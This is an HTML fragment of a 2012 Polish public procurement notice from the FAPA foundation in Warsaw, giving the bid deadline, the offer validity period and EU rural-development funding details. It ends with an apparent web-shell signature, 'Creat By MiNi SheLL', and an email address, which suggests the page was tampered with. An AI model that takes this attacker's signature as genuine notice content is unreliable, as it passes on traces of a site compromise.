<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.09.2012 godzina 10:00, miejsce: Fundacja Programów Pomocy dla Rolnictwa FAPA
ul. Wspólna 30
00-930 Warszawa
sekretariat - pok. 253.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Schemat III Pomocy Technicznej Programu Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com